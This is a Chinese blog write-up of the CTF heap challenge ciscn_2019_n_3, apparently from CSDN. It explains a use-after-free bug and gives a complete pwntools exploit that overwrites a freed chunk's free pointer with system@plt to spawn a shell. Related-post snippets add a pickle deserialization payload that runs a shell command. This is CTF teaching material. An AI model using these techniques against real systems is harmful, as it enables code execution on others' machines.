ciscn_2019_n_3

最新推荐文章于 2025-03-20 16:34:12 发布
原创 最新推荐文章于 2025-03-20 16:34:12 发布 · 676 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #安全 #网络安全

这篇博客详细介绍了如何通过在CNote程序中利用未初始化的指针(UAF)进行堆操作,创建、删除chunk并利用它们来实现代码执行。作者展示了如何申请chunk、释放chunk以操纵内存,最终实现通过设置rec_str_free指向system@plt获取shell。关键步骤包括新chunk创建、do_del函数分析及payload构造。
部署运行你感兴趣的模型镜像

ciscn_2019_n_3

使用checksec查看:
在这里插入图片描述
开启了栈不可执行和Canary。

放进IDA中查看,看菜单像是一道堆题,运行程序看下:
在这里插入图片描述
标准的堆菜单题,IDA中仔细分析下:
在这里插入图片描述
主要流程:创建、删除、查看,先来看看创建的函数do_new()
在这里插入图片描述

  • records[v2]:存储 chunk 的地址,大小为0xc
  • *v3:存储rec_int_print 函数地址用于打印存储的值和类型。
  • *(v3 + 4):存储 free 函数地址,用于释放 chunk 。
  • *(v3 + 8):存储用户输入的值,如果值的类型为整数,则直接存在 *(v3 + 8)中,如果值的类型为字符串,则*(v3 + 8) 存的是字符串的地址。

接下来看下do_del()
在这里插入图片描述

  • 执行了records[v0] + 4所指向的函数,即rec_str_freerec_int_free
    在这里插入图片描述
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VT7tk8dl-1638501552719)(ciscn_2019_n_3.assets/image-20211021163734498.png)]
  • 均未清空指针,存在UAF。

do_dump()
在这里插入图片描述

  • 执行了records[v0]所指向的函数,即rec_str_printrec_int_print

既然存在UFA可以试着去利用下:

  • rec_str_printrec_str_free都是存放在系统创建的指针中的,那么我们先申请两个chunk
    在这里插入图片描述
  • 接着释放掉这两个chunk,两个系统创建的chunk便会进入fastbins中
    在这里插入图片描述
  • 这时候我们去申请大小为0xc的chunk,便能将两这两个chunk给申请出来,并且能修改其中一个的值
  • 若将rec_str_free的值改为system@plt就可以直接getshell

注意点:调用rec_str_free的时候,需要一个值,这个值在rec_str_free-4处(看do_del()代码),即rec_str_print所在的位置。

所以我们的payload需要写成:b'bash' + p32(system_addr)

  • 这时候释放chunk的时候就会调用system('bash')

完整exp:

from pwn import *

#start
r = process("../buu/ciscn_2019_n_3")
elf = ELF("../buu/ciscn_2019_n_3")

def new(num,tp,length,value):
    r.sendlineafter("CNote > ","1")
    r.sendlineafter("Index > ",str(num))
    r.sendlineafter("Type > ",str(tp))
    r.sendlineafter("Length > ",str(length))
    r.sendlineafter("Value > ",value)

def delete(num):
    r.sendlineafter("CNote > ","2")
    r.sendlineafter("Index > ",str(num))

def show(num):
    r.sendlineafter("CNote > ","3")
    r.sendlineafter("Index > ",str(num))

#params 
system_addr = elf.symbols['system']

#attack
new(1,2,0x30,"MMMM")
new(2,2,0x30,"MMMM")


delete(1)
delete(2)

payload = b'bash' + p32(system_addr)

new(3,2,0xc,payload)
delete(1)

r.interactive()

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3291
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
[BUUCTF]PWN——ciscn_2019_n_3
mcmuyanga的博客
01-06 1194
ciscn_2019_n_3 附件 步骤 例行检查,32位,开启了nx和canary保护 本地试运行一下,经典的堆题的菜单 3.32位ida载入 new(),申请了两个chunk,第一个chunk(13行)固定大小0xC,存放的是rec_int_print和rec_int_free函数的地址,第二个chunk(32行),是我们申请的chunk del() 如果值是整数,直接 free chunk 如果值是字符串,则 chunk 和存储字符串的 chunk 都要 free。注意这里只是进行了
ciscn_2019_ne_3
seaaseesa的博客
05-07 507
ciscn_2019_ne_3 (在rop长度过小情况下,通过read劫持read自身的返回来达到后续大量rop) 首先检查一下程序的保护机制 然后,我们用IDA分析一下,32位栈溢出,难点在于结束变更了两次esp,因此,我们单纯的溢出,直接会造成esp变更到一个无效的地址处。 因此,我们需要将将ecx覆盖为bss段,将栈切换到bss上进行rop。但是切换到bss之前,需要先...
ciscn_2019_n_3[use after free]
、moddemod
07-05 394
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def new_note(idx, _type, length, value): p.sendlineafter('CNote > ', str(1)) p.sendlineafter('Index > ', str(idx)) p.sendlin..
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 1014
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
BUU CTF ciscn_2019_n_1
A_fish_like_sing的博客
03-20 2103
新手向对BUU CTF ciscn_2019_n_1该题的两种解法
buuctf_ciscn_2019_n_5
2301_81060697的博客
02-20 428
buuctf
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1913
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
ciscn_2019_n_3 题解
lifanxin的博客
12-30 734
Write Up知识点关键字样本运行静态分析求解思路求解脚本 知识点关键字 UAF fastbin 样本 ciscn_2019_n_3 运行 检查样本   32位小端程序,开启了栈保护和NX保护。 运行样本   样本的运行结果如上图所示:该程序主要模仿了一个笔记管理的功能,选项1可以开辟新的节点,会让选中是整型还是文本;选项2会让我们根据索引删除一个节点;选型3可以打印一个节点中存储的数据信息;选项4主要是打印一个随机生成的金钱数目,告诉你没法购买Pro版本。   此处不赘述也不一一截图运行结果,读者可
ciscn_2019_en_3
z1r0的博客
02-11 1349
ciscn_2019_en_3 查看保护 漏洞点的话出在id这里还有一个uaf。id这里借助read的不加00的特性来输出libc。 uaf这个漏洞直接用tcache double free来打就行,改hook为one_gadget即可getshell。具体的tcache攻击细节见z1r0’s blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug
buuctf ciscn_2019_n_3
weixin_45677731的博客
08-31 328
do_new函数: 申请一个0xc大小的chunk,前四个字节存放的是输出函数的地址,中间四个字节存储的是删除函数的地址,最后四个字节,因数据类型的不同而不同 当你选择整数类型,最后四个字节存放的就是一个数字 当你选择文本类型,你就可以向程序请求申请一个一定大小的chunk用于存放文本,而最后四个字节存放的就是这个新的chunk的地址 do_dump函数: 输出内容 do_del函数: 发现free并未将指针置0,再看rec_int_free函数和rec_str_free函数,也没有置0,存在UAF的漏
ciscn_2019_n_3 Writeup
Calllin的博客
05-10 548
前提 本程序中的释放堆块后未对堆块指针置空,从而可能引发UAF。 程序本身带有函数system(),可以直接使用system@plt的方式使用该函数。 涉及堆块结构的代码如下下文所示,第一种块大小固定位0x10(0x11),有一种块大小可控,最大为0x400。 //当堆块结构是integer时 *(_DWORD *)v3 = rec_int_print; *(_DWORD *)(v3 + 4) = rec_int_free; *(_DWORD *)(v3 + 8) = ask("Value"); //
buuoj刷题记录 - ciscn_2019_n_3 1
qq_34010404的博客
03-15 522
查看程序保护: IDA分析程序,可以发现程序存在UAF漏洞: 只要使某一个Node的数据区域和已经free的Node的12个字节相重合,就可以修改函数地址. 只需要这样构造即可: 释放掉Node1,Node0,然后add一个 content为12字节的Node.就可以修改Node1的前12个字节. 1.可以修改Note1的前四个字节为 ‘sh\x00\x00’,后四个改为system.plt 2.可以修改Node1前四个字节为system.plt 的下一条指令地址(直接jmp由于该指令的地址低字节为
ciscn_2019_n_3 writeup
SkYe's Blog
10-24 673
基本情况 这题被环境坑了一把,用的是 docker 环境做题,checksec 检测是保护全开,ida 分析时也没有留意地址都是真实地址,所以一直没想用 system@plt getshell 。。。后面才发现程序是关闭 PIE ,程序有 system ,直接调用不需要泄露 libc 操作。 程序是一个有增删查的堆管理器,根据存储资料的类型分为两类,对应结构体如下: struct int_chunk { void *rec_int_print(); void *rec_int_free();
ciscn_2019_n_3题目细说
Tw0的博客
02-04 300
修正一些exp讲解思路不对的地方,讲述真正getshell的原理。
【buu刷题】ciscn_2019_final_3
m0_73756460的博客
03-18 551
【buu刷题】ciscn_2019_final_3 write up
ciscn_2019_n_8
最新发布
03-24
### 关于CISCN 2019 N8题目的解析 在全国大学生信息安全竞赛(CISCN)中,Web方向的题目通常涉及漏洞利用、文件包含、反序列化攻击等内容。对于CISCN 2019中的N8题目,其核心考点可能围绕PHP反序列化漏洞展开。 #### PHP反序列化漏洞分析 在CISCN 2019 Web1题目中提到的内容表明,该赛事的部分题目设计基于PHP对象反序列化的特性[^2]。具体到N8题目,可能存在类似的机制: - **Payload构造**:通过精心构造的对象结构触发特定逻辑路径,实现任意文件读取或其他敏感操作。 - **关键点提示**:根据已有资料,在某些情况下需要调整`Handle`类的相关属性来适配目标环境的要求[^5]。 以下是针对此类问题的一个通用解决思路及其Python脚本示例用于生成payload: ```python import pickle class Exploit(object): def __reduce__(self): import os command = 'cat /flag' # 假设我们需要执行命令获取flag return (os.system, (command,)) def serialize_exploit(): serialized_data = pickle.dumps(Exploit()) with open('exploit_payload', 'wb') as f: f.write(serialized_data) serialize_exploit() ``` 需要注意的是上述代码仅为演示如何创建一个简单的pickle反序列化攻击向量,并不适用于实际比赛场景下的PHP应用;真正的解决方案需依据具体的程序行为模式定制相应的php序列化字符串形式的数据包提交给服务器端处理以达成预期效果。 #### 文件上传与包含技巧 如果N8还涉及到文件上传功能,则可以尝试以下方法绕过检测并植入恶意脚本: - 利用MIME类型校验不足上传图片马; - 结合LFI(Local File Inclusion)缺陷访问已上载至服务器上的特制图像文件完成进一步渗透活动。 综上所述,解答这类综合性较强的CTF赛题不仅考验选手们的技术功底同时也对其创造力提出了较高要求。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值